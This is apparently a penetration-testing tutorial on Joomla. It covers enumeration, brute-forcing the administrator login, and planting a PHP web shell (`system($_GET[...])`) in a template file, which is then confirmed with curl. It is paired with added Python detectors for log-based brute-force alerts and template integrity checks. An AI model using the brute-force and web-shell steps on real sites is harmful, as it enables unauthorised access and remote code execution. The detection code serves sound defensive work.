# Joomla

## Enumeration

We can fingerprint Joomla by looking at the page source.

```bash
curl -s http://dev.site.local/ | grep Joomla
```

The `robots.txt` file of a Joomla site usually looks like this:

```bash
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
```

We can read the Joomla version from the `README.txt` file if it is present.

```bash
curl -s http://dev.site.local/README.txt | head -n 5

1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```

On some Joomla installations, we can obtain the version from the JavaScript files in the `media/system/js/` directory or by browsing to `administrator/manifests/files/joomla.xml`.

```bash
curl -s http://dev.site.local/administrator/manifests/files/joomla.xml | xmllint --format -

<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
  <name>files_joomla</name>
  <author>Joomla! Project</author>
  <authorEmail>admin@joomla.org</authorEmail>
  <authorUrl>www.joomla.org</authorUrl>
  <copyright>(C) 2005 - 2019 Open Source Matters. All rights reserved</copyright>
  <license>GNU General Public License version 2 or later; see LICENSE.txt</license>
  <version>3.9.4</version>
  <creationDate>March 2019</creationDate>
  <SNIP>
```

Using [JoomlaScan](https://github.com/drego85/JoomlaScan):

```bash
python2.7 joomlascan.py -u http://dev.site.local

-------------------------------------------
      	     Joomla Scan                  
   Usage: python joomlascan.py <target>    
    Version 0.5beta - Database Entries 1233
         created by Andrea Draghetti       
-------------------------------------------
Robots file found: 	 	 > http://dev.site.local/robots.txt
No Error Log found

Start scan...with 10 concurrent threads!
Component found: com_actionlogs	 > http://dev.site.local/index.php?option=com_actionlogs
	 On the administrator components
Component found: com_admin	 > http://dev.site.local/index.php?option=com_admin
	 On the administrator components
Component found: com_ajax	 > http://dev.site.local/index.php?option=com_ajax
	 But possibly it is not active or protected
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_actionlogs/actionlogs.xml
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_admin/admin.xml
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_ajax/ajax.xml
	 Explorable Directory 	 > http://dev.site.local/components/com_actionlogs/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_actionlogs/
	 Explorable Directory 	 > http://dev.site.local/components/com_admin/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_admin/
Component found: com_banners	 > http://dev.site.local/index.php?option=com_banners
	 But possibly it is not active or protected
	 Explorable Directory 	 > http://dev.site.local/components/com_ajax/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_ajax/
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_banners/banners.xml

<SNIP>
```

The default administrator account on Joomla installations is `admin`, but the password is set at installation time. We can brute force it with [joomla-brute](https://github.com/ajnik/joomla-bruteforce).

```bash
python3 joomla-brute.py -u http://dev.site.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin
```
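From a defender's side, the fingerprinting, component scan and login brute force shown above all leave a distinctive footprint in the web server access log: one client fetching the version-disclosing files, requesting dozens of distinct `option=com_*` components in a few seconds, or sending a burst of POSTs to `/administrator/index.php`. The following detector is an added example written for these notes, not code from Joomla, JoomlaScan or joomla-brute; the combined-log regex, the thresholds and the sample log lines are assumptions constructed for the demonstration.

```python
"""Flag Joomla enumeration and administrator brute force in access logs.

Added example for these notes. The log format (Apache "combined"), the
thresholds and the sample lines are assumptions/constructed data.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
COMPONENT_RE = re.compile(r"option=(com_[a-z0-9_]+)")
# Files whose retrieval discloses the Joomla version (see the notes above).
VERSION_PATHS = ("/README.txt", "/administrator/manifests/files/joomla.xml")

COMPONENT_THRESHOLD = 20   # distinct com_* components from one IP (assumed)
LOGIN_THRESHOLD = 10       # POSTs to /administrator/index.php in one window (assumed)
WINDOW_SECONDS = 60


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyse(lines):
    """Return {ip: [alert, ...]} for clients showing enumeration or brute force."""
    components = defaultdict(set)
    logins = defaultdict(list)
    version_probes = defaultdict(set)
    alerts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        m = COMPONENT_RE.search(path)
        if m:
            components[ip].add(m.group(1))
        if rec["method"] == "POST" and path.startswith("/administrator/index.php"):
            logins[ip].append(rec["ts"])
        if path.split("?")[0] in VERSION_PATHS and rec["status"] == "200":
            version_probes[ip].add(path)
    for ip, comps in components.items():
        if len(comps) >= COMPONENT_THRESHOLD:
            alerts[ip].append(f"component enumeration: {len(comps)} distinct com_* components")
    for ip, times in logins.items():
        times.sort()
        # Sliding window: count POSTs within WINDOW_SECONDS of each login attempt.
        for i, start in enumerate(times):
            j = i
            while j < len(times) and (times[j] - start).total_seconds() <= WINDOW_SECONDS:
                j += 1
            if j - i >= LOGIN_THRESHOLD:
                alerts[ip].append(f"admin login brute force: {j - i} POSTs within {WINDOW_SECONDS}s")
                break
    for ip, paths in version_probes.items():
        alerts[ip].append("version disclosure file fetched: " + ", ".join(sorted(paths)))
    return dict(alerts)


def sample_log():
    """Constructed log lines: a component scanner, a brute forcer that also
    fetched README.txt, and one ordinary visitor."""
    fmt = ('{ip} - - [10/Mar/2023:12:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" '
           '{status} 512 "-" "{ua}"')
    lines = []
    for i in range(25):
        lines.append(fmt.format(ip="203.0.113.5", sec=i, method="GET",
                                path=f"/index.php?option=com_probe{i}",
                                status=200, ua="python-requests/2.28"))
    for i in range(12):
        lines.append(fmt.format(ip="198.51.100.7", sec=i, method="POST",
                                path="/administrator/index.php", status=303, ua="curl/7.88"))
    lines.append(fmt.format(ip="198.51.100.7", sec=20, method="GET",
                            path="/README.txt", status=200, ua="curl/7.88"))
    lines.append(fmt.format(ip="192.0.2.10", sec=30, method="GET",
                            path="/index.php?option=com_content&view=article&id=1",
                            status=200, ua="Mozilla/5.0"))
    return lines


if __name__ == "__main__":
    for ip, found in analyse(sample_log()).items():
        for alert in found:
            print(f"{ip}: {alert}")
```

The ordinary visitor touches one component and triggers nothing, while the scanner and the brute forcer each produce an alert; feeding real log lines to `analyse()` requires only that they match the combined format assumed in `LOG_RE`. The same log evidence points at the mitigations: remove or block `README.txt` and `administrator/manifests/files/joomla.xml` at the web server, and rate-limit or IP-restrict `/administrator/`.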

***

## Exploitation

Let's log in to the target backend at `http://dev.site.local/administrator` using `admin:admin`.

From here, we can click `Templates` at the bottom left under `Configuration` to open the templates menu, then click a template name and customize it.

Let's choose the `error.php` page. We'll add a PHP one-liner to obtain code execution as follows.

```php
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
```


Once that is done, click `Save & Close` at the top and confirm code execution using `curl`.

```bash
curl -s http://dev.site.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
```
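The template edit above changes a PHP file on disk through a feature that works as designed, so the durable control is to know what the template files are supposed to contain and to notice when one of them changes or starts calling a command-execution function on request input. The script below is an added example for these notes, not Joomla code: it baselines the SHA-256 of every file under a templates directory, re-checks later for changed, new or missing files, and additionally flags PHP files that combine `system`/`exec`/`eval`-style calls with `$_GET`/`$_POST` input. The baseline layout, the function names and the sample `error.php` are assumptions constructed for the demonstration.

```python
"""Integrity and web-shell heuristic check for Joomla template files.

Added example for these notes, not Joomla code. The baseline format, the
function names and the sample template are assumptions/constructed data.
"""
import hashlib
import os
import re
import tempfile

DANGEROUS_CALL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
)
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(templates_root):
    """Map every file under templates_root (relative path) to its SHA-256."""
    baseline = {}
    for dirpath, _, files in os.walk(templates_root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, templates_root)] = sha256_file(full)
    return baseline


def check_templates(templates_root, baseline):
    """Return findings as (relative_path, reason) tuples; empty when all is well."""
    findings = []
    current = build_baseline(templates_root)
    for rel, digest in current.items():
        if rel not in baseline:
            findings.append((rel, "new file not in baseline"))
        elif baseline[rel] != digest:
            findings.append((rel, "content changed since baseline"))
        if rel.endswith(".php"):
            # Heuristic: a template calling a command/eval function on request
            # input is the pattern of the one-liner shown above.
            with open(os.path.join(templates_root, rel), encoding="utf-8",
                      errors="replace") as f:
                src = f.read()
            if DANGEROUS_CALL_RE.search(src) and SUPERGLOBAL_RE.search(src):
                findings.append((rel, "command/eval function combined with request input"))
    for rel in baseline:
        if rel not in current:
            findings.append((rel, "file missing"))
    return findings


# Constructed stand-in for a clean template error page (not the real protostar file).
CLEAN_ERROR_PHP = """<?php
defined('_JEXEC') or die;
?>
<html><body><h1>Error</h1></body></html>
"""


def demo():
    """Baseline a clean template, then append a web-shell one-liner and re-check.
    Returns (findings_before, findings_after)."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "protostar")
    os.makedirs(tpl)
    error_php = os.path.join(tpl, "error.php")
    with open(error_php, "w") as f:
        f.write(CLEAN_ERROR_PHP)
    baseline = build_baseline(root)
    before = check_templates(root, baseline)
    with open(error_php, "a") as f:
        f.write("<?php system($_GET['cmd']); ?>\n")  # constructed tampering
    after = check_templates(root, baseline)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("clean:", before)
    print("tampered:", after)
```

In practice the baseline is taken right after installation or a verified update, stored outside the web root, and the check runs from cron or a file-integrity monitor; the hash comparison catches any edit at all, and the call heuristic gives a first triage hint about which changed file deserves a look.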

